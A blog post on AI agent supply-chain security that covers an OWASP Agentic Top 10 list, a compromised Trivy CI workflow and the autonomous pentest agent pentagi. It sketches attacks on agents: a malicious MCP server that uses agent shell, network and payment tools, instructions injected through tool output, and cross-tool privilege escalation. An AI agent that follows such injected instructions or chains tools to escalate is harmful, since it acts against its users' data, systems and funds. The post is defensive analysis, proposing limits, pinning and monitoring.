Skip to main content

Command Palette

Search for a command to run...

Agent Tooling Supply Chain Security: OWASP Agentic Top 10 and the pentagi Threat Model

Trivy got compromised. Autonomous pentest agents are trending. The OWASP Agentic Top 10 warned us.

Published
7 min read
U
I'm building payment rails for agent-to-agent payments

Agent Tooling Supply Chain Security: OWASP Agentic Top 10 and the pentagi Threat Model

Two things happened in the same week. Trivy, the most popular container vulnerability scanner, got its GitHub Actions workflow compromised through a supply chain attack. And pentagi - a fully autonomous AI agent penetration testing system - started trending on GitHub.

One showed how fragile the tools agents depend on are. The other showed what agents themselves can do when pointed at your infrastructure with no guardrails. Together, they paint a picture that the OWASP Agentic Security Top 10 has been warning about since early 2026.

I've been thinking about this intersection for months while building agent payment infrastructure. Here's what the security picture actually looks like when you combine supply chain vulnerabilities with autonomous agent capabilities.

The OWASP Agentic Security Top 10: What It Gets Right

OWASP published their Agentic Security Top 10 specifically for AI agent systems. It's different from the LLM Top 10 - focused on what happens when models get tools, autonomy, and the ability to chain actions together.

The top risks they identified:

  1. Agentic Misuse - Agents used to automate attacks (pentagi is literally this, but legitimized)
  2. Agentic Data Leakage - Agents exfiltrating sensitive data through tool outputs
  3. Agentic Identity and Access Management - Agents inheriting overprivileged permissions
  4. Prompt Injection at Agent Layer - Injections that redirect agent actions, not just model outputs
  5. Agentic Privilege Escalation - Agents bootstrapping from low-privilege to admin through tool chains
  6. Agentic Supply Chain - Compromised tools, plugins, MCP servers, or skill packages
  7. Agentic Insecure Output Handling - Agents producing outputs that become injection vectors downstream
  8. Agentic Monitoring Gaps - No visibility into what autonomous agents are actually doing
  9. Agentic Resource Overuse - Agents burning compute, API calls, or funds without limits
  10. Agentic Unintended Autonomy - Agents taking actions beyond their intended scope

Numbers 6 and 1 are the ones that converged this week. Let me break down why.

The Trivy Supply Chain Attack: Anatomy of Risk #6

The Trivy compromise wasn't an attack on Trivy's source code. It targeted the GitHub Actions workflow - the CI/CD pipeline that runs automatically when developers push code. The attacker modified the action to exfiltrate secrets from repositories using Trivy for security scanning.

Think about the irony. The security scanner itself became the attack vector. And because Trivy runs in CI/CD with elevated permissions (it needs access to container images, package manifests, sometimes cloud credentials), the blast radius was enormous.

Now scale this to agent tooling. Every MCP server an agent loads is a supply chain dependency. Every skill package, every tool definition, every plugin. The everything-claude-code framework has 116 skills. DeerFlow has an MCP server registry. LangChain has hundreds of community tools.

Each one is a potential Trivy. A compromised MCP server doesn't just steal CI secrets - it runs inside an agent session with whatever permissions the agent has. File system access. Network access. Shell execution. Payment capabilities (if the agent has them).

The attack surface for OWASP #6 in agent systems is orders of magnitude larger than in traditional CI/CD.

pentagi: Autonomous Pentest Agents as Risk #1 Made Real

vxcontrol/pentagi is an autonomous AI agent system designed to perform penetration testing. It chains together reconnaissance, vulnerability discovery, exploitation, and reporting without human intervention.

This is OWASP #1 (Agentic Misuse) in production form. Not theoretical. Not a paper. A working system that points agents at infrastructure and lets them find and exploit vulnerabilities autonomously.

pentagi is a legitimate security tool - red teams need automation too. But the architecture it demonstrates applies equally to offensive use. An autonomous agent with tool access, persistence, and the ability to reason about multi-step exploitation chains is a capability that wasn't available 12 months ago.

The technical architecture matters: pentagi uses LLM-driven planning to identify attack paths, then executes them through tool integrations (nmap, metasploit, custom scripts). The agent maintains state across the engagement, learns from failed attempts, and adapts its strategy. Sound familiar? It's the same agent loop pattern used in coding agents, research agents, and trading agents. Just pointed at a different target.

Where Supply Chain Meets Autonomous Exploitation

Here's the convergence that should worry anyone building agent infrastructure:

Scenario: A compromised MCP server gets installed into an agent framework. The compromised server doesn't just exfiltrate data (Trivy pattern). It uses the agent's own capabilities to perform lateral movement. The agent has shell access? The compromised tool uses it. The agent has network access? The compromised tool scans internal services. The agent has payment tools? The compromised tool drains funds.

This isn't pentagi's fault - pentagi is a legitimate tool. But pentagi proves the capability exists. Autonomous multi-step exploitation through agent tool chains is a solved problem. The question is whether your agent framework's security model can handle a malicious tool inside the perimeter.

Most can't. Here's why.

Current Agent Security Models Are Insufficient

The standard agent security model is:

  1. User approves which tools the agent can use
  2. Some tools have confirmation prompts ("Are you sure you want to delete this file?")
  3. Sandboxing (if any) is at the process level

This misses three attack vectors the OWASP Agentic Top 10 identifies:

Cross-tool escalation (OWASP #5): Agent has a read-only file tool and a shell tool. A compromised MCP server uses the read tool to find credentials, passes them to the shell tool, escalates. Each tool is "safe" in isolation. Together, they're an attack chain.

Output-as-injection (OWASP #7): Agent queries a compromised API. The API returns data with embedded instructions. The agent processes the data, follows the embedded instructions, performs actions the user never authorized. This is prompt injection via tool output - a supply chain attack that doesn't require compromising the tool itself.

Monitoring gaps (OWASP #8): Most agent frameworks log prompts and responses. Almost none log the full chain of tool invocations, parameter values, and side effects at a level that enables post-incident forensics. You can't investigate what you didn't record.

What Actually Works: Defense in Depth for Agent Systems

Based on what I've seen building and auditing agent payment systems, here's what a real defense model looks like:

Tool-level spending/action limits. Not just "can the agent use this tool?" but "how many times per hour?" and "what's the maximum impact per invocation?" For payment tools, this means SpendingPolicy enforcement - daily limits, per-transaction caps, recipient allowlists. For shell tools, this means command allowlists and output size limits.

MCP server integrity verification. Every MCP server should have a verifiable hash. Every update should be explicitly approved. Auto-updates for agent tools are the Trivy pattern waiting to happen. Pin your versions. Verify your sources.

Cross-tool interaction monitoring. Log not just individual tool calls, but the pattern of calls. "Read file then execute shell command with file contents" is a detectable pattern. "Query external API then modify local files based on response" is another. Pattern-based detection catches cross-tool escalation that individual tool monitoring misses.

Non-custodial architecture for sensitive operations. For payment tools specifically: non-custodial means the damage from a compromised agent session is bounded by the wallet's funded balance and SpendingPolicy limits. Custodial means a compromised session could potentially access the custodian's full infrastructure. Blast radius matters.

Audit trails on-chain. Every payment an agent makes should produce a verifiable, immutable receipt. Not a log entry that can be tampered with. An on-chain record that both parties can verify independently. This is defense against OWASP #8 specifically for financial operations.

The Agent Security Stack Is Being Built Now

The agent security category is accelerating. pentagi for offensive testing. AgentShield (from everything-claude-code) for defensive scanning. Trivy's compromise forcing the entire DevSecOps community to rethink CI/CD trust models.

For anyone building agent systems right now, the OWASP Agentic Top 10 is the minimum reading list. The Trivy attack is the case study for supply chain risk. pentagi is the proof that autonomous agent exploitation works.

The agents are getting more capable every week. The security models need to keep pace.

This article was written with AI assistance. All technical claims, code, and architectural decisions were validated by the author.